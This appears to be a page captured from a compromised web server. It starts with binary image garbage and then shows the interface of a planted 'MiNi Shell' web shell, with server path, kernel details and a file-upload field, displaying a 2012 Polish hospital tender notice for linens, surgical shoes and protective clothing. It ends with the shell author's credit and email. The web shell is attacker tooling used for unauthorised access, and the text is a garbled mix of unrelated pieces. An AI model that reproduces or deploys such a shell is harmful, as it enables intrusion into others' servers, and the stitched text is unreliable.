JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120709/148869-N-2012.html

<p class="kh_header"><b>Wrocław: Sukcesywna dostawa z podziałem na 4 pakiety:
Pakiet nr 1-Prześcieradeł, Podkładów, Poszew, Koszul,
Pakiet nr 2- Poduszek, koców
Pakiet nr 3-Obuwia operacyjnego
Pakiet nr 4-Odzieży ochronne szpitalnej</b><br>
<b>Numer ogłoszenia: 148869 - 2012; data zamieszczenia: 09.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Onkologii we Wrocławiu , pl. Hirszfelda 12, 53-413 Wrocław, woj. dolnośląskie, tel. 71 3689584, faks 71 36 89 583; 36 89 234.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dco.com.pl, www.przetargipubliczne.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dco.com.pl,</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa z podziałem na 4 pakiety:
Pakiet nr 1-Prześcieradeł, Podkładów, Poszew, Koszul,
Pakiet nr 2- Poduszek, koców
Pakiet nr 3-Obuwia operacyjnego
Pakiet nr 4-Odzieży ochronne szpitalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zgodnie z załącznikiem 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości łącznie  1.192 zł (jeden tysiąc sto dziewięćdziesiąt dwa zł), a dla poszczególnych pakietów zgodnie z tabelą podaną poniżej: 
Nr zadania	 Wysokość wadium  
1	290 ZŁ 
2	82  zł 
3	80 ZŁ
4	740 ZŁ
8.1.	Wadium może być wniesione w jednej lub kilku następujących formach:
8.1.1.	pieniądzu ,
8.1.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
8.1.3.	gwarancjach bankowych,
8.1.4.	gwarancjach ubezpieczeniowych,
8.2.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
8.3.	W przypadku wnoszenia wadium w formie gwarancji, gwarancja musi być  gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzoną zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
  a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji   (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,
 b)  określenie wierzytelności, która ma być zabezpieczona gwarancją,
 c)  kwotę gwarancji,
 d)  termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
 - odmówił podpisania umowy na warunkach określonych w ofercie,
 - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.4. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn nieleżących po jego stronie.
8.5.	W przypadku wnoszenia wadium w formie gwarancji, z treści gwarancji musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upełnomocnionego przedstawiciela Gwaranta. Z treści powinno wynikać bezwarunkowe na pierwsze pisemne żądanie zgłoszenie przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu kwoty wadium w okolicznościach określonych przepisami Art. 46 ust. 4 a i  5 ustawy.
8.6.	Wadium musi być wniesione przed upływem terminu składania ofert.
8.7.	Wadium w formie pieniądza należy wnieść na rachunek bankowy Zamawiającego w Kredyt Banku S.A. IV Oddział Wrocław nr 57 1500 1793 1217 9000 7528 0000 z dopiskiem ZP-PN-42-12-EZPL. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym wyżej terminie znajdzie się na rachunku bankowym Zamawiającego.  
8.8.	Wadium wnoszone w pozostałych formach należy złożyć w formie oryginału w siedzibie Zamawiającego pl. Hirszfelda 12, budynek H pok. 416 ( godz. otwarcia 8.00-10.00 i 12.00-14.00) najpóźniej do TERMINU składania ofert. Prosimy nie załączać oryginału dokumentu stanowiącego wadium przetargowe do oferty.
8.9.	Prosimy o dołączenie do oferty kserokopii potwierdzonego za zgodność z oryginałem dokumentu stanowiącego wadium przetargowe.
8.10.	Wykonawca, który nie zabezpieczy oferty wadium zostanie wykluczony z postępowania. 
8.11.	Zwrot wadium nastąpi w trybie i okolicznościach określonych w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie  z art. 24 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest  wykazanie należytego wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 2 zamówień trwających co najmniej 12 miesięcy, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia.
Za zamówienia odpowiadające swym rodzajem i wartością uważa się dostawę:
Dla pakietu 1- dostawa prześcieradeł, podkładów, poszew i koszul szpitalnych o wartości co najmniej  10 000   zł brutto każda.
Dla pakietu 2 - nie dotyczy
Dla pakietu 3 - nie dotyczy
Dla pakietu 4- dostawa  odzieży ochronnej szpitalnej (ubrań lekarskich, fartuchów)   o wartości co najmniej   20 000   zł brutto każda.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Odpowiednie katalogi producenta, foldery lub materiały źródłowe producenta w czytelny i jasny sposób potwierdzające spełnianie parametrów techniczno-użytkowych opisanych przez  Zamawiającego w załączniku Nr 1 do SIWZ. Brak potwierdzenia parametrów wymaganych zostanie uznany za niespełnienie przez oferowany asortyment tychże parametrów i spowoduje odrzucenie oferty, chyba że zachodzić będą przesłanki określone w art. 26 ust. 3 ustawy .W przypadku sporządzenia ww. dokumentów w języku obcym do oferty należy dołączyć dokument (y) wraz z tłumaczeniem na język polski. Zamawiający zastrzega sobie prawo do sprawdzenia wiarygodności podanych przez Wykonawcę parametrów we wszystkich dostępnych źródłach w tym również poprzez zwrócenie się o złożenie dodatkowych wyjaśnień przez Wykonawcę. Wykonawca winien zaznaczyć w katalogu, którego Pakietu i pozycji opis dotyczy.      
2.	Oświadczenie Wykonawcy,  że oferowane obuwie operacyjne posiada certyfikat CE zgodny z normą EN ISO 20347:2004 + A1 2007- dotyczy pakietu nr 3</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku braku możliwości dostawy produktu objętego niniejszą umową z przyczyn niezależnych od Wykonawcy, Zamawiający dopuszcza zastąpienie jego innym produktem o innej nazwie handlowej i od innego producenta, z zastrzeżeniem, że musi on spełniać warunki określone w opisie przedmiotu zamówienia zawartego w SIWZ i  z zachowaniem ceny zawartej w ofercie wykonawcy.
8.2  Zmiana opisana w ust 1. może nastąpić wyłącznie za zgodą Zamawiającego po uprzedniej pisemnej informacji Wykonawcy zawierającej okoliczności i przyczyny konieczności wprowadzenia zamiany i czasu jej trwania oraz po dostarczeniu wszelkich dokumentów wymaganych w SIWZ .
8.3 Za obopólną zgodą stron, w przypadku nie wyczerpania wartości i asortymentu umowy przed jej wygaśnięciem może być ona przedłużona do momentu wykorzystania całej wartości i asortymentu poprzez wprowadzeniu aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dco.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Onkologii we Wrocławiu Dział Zamówień Publicznych i Logistyki
Pl. Hirszfelda 12 53-413 Wrocław
z dopiskiem: postępowanie nr ZP-PN-42-12-EZPL.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2012 godzina 10:00, miejsce: Dolnośląskie Centrum Onkologii we Wrocławiu Dział Zamówień Publicznych i Logistyki
Pl. Hirszfelda 12 53-413 Wrocław
z dopiskiem: postępowanie nr ZP-PN-42-12-EZPL.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1 - Prześcieradła, Podkłady Poszwy, Koszule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Prześcieradło  o wym. 220cmx160cm, 100% bawełny, gramatura materiału - 155-160g/m2 , białe, temp. prania - 60°C - 95°C 	200	szt.
2.	Podkład  o wym. 160cmx0,90cm, 100% bawełny, gramatura materiału - 155-160g/m2   , białe, temp. prania - 60°C-95°C	150	szt.
3.	Poszwa  o wym. 210cmx158-160cm, 100% bawełny, gramatura materiału - 155-160g/m2  , biała, temp. prania - 60°C - 95°C, zapinana na guziki	200	szt.
4.	Poszewka  o wym. 78cmx80cm, 100% bawełny, gramatura materiału - 155-160g/m2  ,biała, temp. prania - 60°C - 95°C, zapinana na guziki	200	szt.
5.	Koszula szpitalna biała, 100% bawełna, z rozcięciem z przodu, rozmiar XL i XXL, temp. prania - 60°C -95°C	70	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2 - Poduszki, Koce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Poduszka z pierza naturalnego, o wym. 70cmx80cm	50	szt.
2.	Poduszka z granulatu silikonowego o wym. 70cmx80cm, z możliwością prania w temperaturze do 40°C	20	szt.
3.	Poduszka Jasiek z granulatu silikonowego, o wym. 40cmx40cm	30	szt.
4.	Koc żakardowy o wym. 205cmx160cm, 18-20% bawełny, 80% akrylu,  kolor beż/brąz, temp. prania do 40°C, na rancie wymagane trwałe oznaczenie DCO WROCŁAW	50	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3 - Obuwie operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Obuwie operacyjne, specjalistyczne, przeznaczone do użytku na salach operacyjnych wykonane z materiału termoplastycznego, możliwość sterylizowania w autoklawach w temperaturze do 135oC i prania w temperaturze 90oC. Posiada własności antystatyczne, podeszwy antypoślizgowe i absorbujące energię w okolicy piętowej, Cholewka z perforacją zapewniająca wymianę powietrza, Produkt z certyfikatem CE zgodnym z normą EN ISO 20347:2004 + A1 2007	44	para.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4- odzież ochronna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ubrania lekarskie męskie 2 częściowe z elano -bawełny  ( o składzie 65% poliester, 35 % bawełny, gramatura materiału 170g/m2, temp.prania 60-95oC,kurczliwość +/-2% ) w kolorze, białym, niebieskim, zielonym o rozm od 46 do 66  
- marynarka - zapinana na napy (nierdzewne o O 10 mmm) bądź na guziki, rękaw długi lub krótki, kołnierz lub stójka
- spodnie - z paskiem( z wszytymi ściągaczami po bokach z gumki), zamek wszyty (kryty) z przodu, nogawki proste.Wszelkie dodatki np. nici, guziki są odporne na wysoką  temperaturę od 60-90°C
	75 kompletów w kolorze białym	komplet
		76 kompletów kolorowych	komplet
2	Ubranie lekarskie damskie 2- częściowe z elano-bawełny  ( o składzie 65% poliester, 35% bawełny,gramatura materiału 170g/m2, temp. prania 60-95oC, kurczliwość +/-2%) w kolorze białym, seledynowym, niebieskim, łososiowym, malinowym o rozm. od 36 do 56
- żakiet - zapinany na napy, (nierdzewne o O 10mm) bądź na guziki, lub zamek, rękaw krótki, ? lub długi, lamówka-wypustka, kołnierzyk lub( wycięcie w szpic,  bądź półokragło lub karo)
- spodnie- długie, proste( z wszytymi ściągaczami po bokach gumki), zamek wszyty (kryty) z przodu.Wszelkie dodatki np. nici, guziki są odporne na wysoką  temperaturę od 60-90°C
	200 kompletów w kolorze białym	komplet
		200 kompletów kolorowych	komplet
3	Garsonka damska 2- częściowa z elano- bawełny ( o składzie 65% poliester, 35% bawełny, gramatura materiału 170g/m2,temp. prania 60-95oC, kurczliwość +/-2%) w kolorze białym, seledynowym, niebieskim, łososiowym, malinowym , o roz. od 36 do 56
- żakiet - zapinany na napy,(nierdzewne o O 10mm) bądź na guziki lub zamek, rękaw krótki,3/4 lub długi, lamówka- wypustka, kołnierzyk lub( wycięcie w szpic, bądź półokrągło lub karo) 
- spódnica- z paskiem zapinanym na guzik(z wszytymi ściągaczami bo bokach  z gumki) długość spódnicy proporcjonalna do rozmiaru(55-75 cm) z wszytym krytym zamkiem z tyłu	100 kompletów w kolorze białym	komplet
		100 kompletów kolorowych	komplet
4	Fartuch damski z elano-bawełny ( o składzie 65% poliester, 35% bawełny,gramatura materiału 170g/m2, temp.prania 60-95oC,kurczliwość +/-2% ) w kolorze białym, niebieskim, łososiowym, zielonym, malinowym o rozm. od 36 do 54
-zapinany na napy lub guziki, dopasowany, regulowany    paskiem z tyłu ( dwie regulacje), długi rękaw,3/4, krótki , z kołnierzem, lub stójką , dwie dolne nakładane kieszenie, jedna kieszeń górna, lamówka-wypustka.Wszelkie dodatki np. nici, guziki są odporne na wysoką  temperaturę od 60-90°C
	40 szt. białych	sztuka
		40 szt. Kolorowych	sztuka
5	
Fartuch męski z elano-bawełny ( o składzie 65% poliester, 35% bawełny, gramatura materiału 170g/m2, temp. prania 60-95oC, kurczliwość +/-2%) w kol. białym o rozm. od 46-66
- zapinany na napy lub guziki regulowany paskiem  z tyłu (dwie regulacje), krótki lub długi rękaw, z kołnierzem, lub stójką, dwie dolne  nakładane kieszenie, jedna górna kieszeń.Wszelkie dodatki np. nici, guziki są odporne na wysoką  temperaturę od 60-90°C
	50 szt białe	sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com